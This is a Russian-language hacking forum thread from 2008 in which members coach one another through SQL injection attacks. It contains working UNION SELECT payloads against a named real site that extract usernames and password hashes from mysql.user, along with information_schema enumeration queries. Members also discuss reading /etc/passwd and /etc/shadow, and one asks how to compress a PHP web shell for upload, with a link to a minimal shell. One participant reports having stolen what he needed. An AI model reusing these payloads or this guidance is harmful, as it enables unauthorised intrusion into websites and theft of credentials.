Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,user,6,7,8,9,10,11,12%20,13%20from%20mysql.user+limit+1,1
     
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @AHMED HASSAN
    the first record in the mysql.user table is empty, so start with the second one:
    http://www.fcmetz.com/voir.php?id=-5036%20union%20select%201,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12%20,13%20from%20mysql.user+limit+1,1

    @zannussi
    похоже на самописный двиг
     
    #3822 [Raz0r], 26 Nov 2008
    Last edited: 26 Nov 2008
  3. d1aVOL

    d1aVOL Elder - Старейшина

    Joined:
    29 Jul 2007
    Messages:
    37
    Likes Received:
    6
    Reputations:
    0
    можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?
     
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    нет
     
    1 person likes this.
  5. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    есть небольшая загвоздка) понять почему так не могу((
    на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
     
  6. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    у тебя нехватает прав для его просмотра. Для примера
    Code:
    /etc/shadow
    Он есть, но прочитать ты его не сможешь :)
     
  7. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всем привет!

    Разъясните...

    Есть скуля - information_schema - доступно.

    далее:
    вываливаются куча всего и там я выцепляю routines:sql_admin
    далее:
    ошибка:
    Table 'db.routines' doesn't exist
    ага, значит все в другой базе.
    далее смотрю в какой именно базе:
    отображается "information_schema"
    подставляю:
    Страница без ошибок обновляется, но ни какой инфы нет.

    Тут меня терзают сомнения:
    1. Корректно ли я указал "information_schema.routines"
    2. Может быть у меня не хватает прав?
    3. Или где-то накосячил изначально?

    Спасибо!
     
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Хотелось бы ссылочку на сайт.
     
  9. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Не хотел бы разглашать )))) ну, сам понимаешь ...
     
  10. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    мм.. даже не знаю что сказать .. даже не сталкивался ..
    попробуй это
    http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+table_name='routines'+limit+1,1--
    также
     
  11. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    по первому запросу - так же пусто, ни какой информации не выводит.

    а по второму вот:

    information_schema.ROUTINES:SQL_ADMIN

    В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.

    НиПоНяТнО (голосом Реввы)
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    дай ссыль в личку
     
  13. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
    Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
    Code:
    http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),table_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables--
    
    потом уже смотришь названия колонок в интересующей таблице:
    Code:
    http://site.com/non.php?id=-6+union+select+1,2,COLUMN_NAME,4,5,6,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME="user"--
    
    А уже потом на основе этих данных составляешь запрос!
     
    1 person likes this.
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    _Pantera_
    Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
    таким запросом ты узнаеш все бд )

    а вот таким запросом ты посмотришь БД в которых лежит таблица..
    а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
     
    #3834 sabe, 27 Nov 2008
    Last edited: 27 Nov 2008
    1 person likes this.
  15. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109

    Я вот непонимаю, зачем если ты не разбираешься в теме умничать?

    table_schema - имя БД
    table_NAME - имя таблицы


    А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица "название таблы"


    PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
     
  16. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всем спасибо!
    Все что нужно стянул.
    sabe, a+
     
  17. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)
     
  18. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
    шелл короче залить..
     
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Попробуй перевести его в16битное шифрование.
     
    #3839 -m0rgan-, 27 Nov 2008
    Last edited: 27 Nov 2008
  20. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    хех товарищ хакер обратите внимание на эти строчки в цитате:
    во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)
    Octave_Parango значит либо нет записей либо есть пустые строки ;)
    masternet пхп шелл итак занимает 1 строчку ;) всё остальное навороты
    вот самый короткий) raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
     
    1 person likes this.
Thread Status:
Not open for further replies.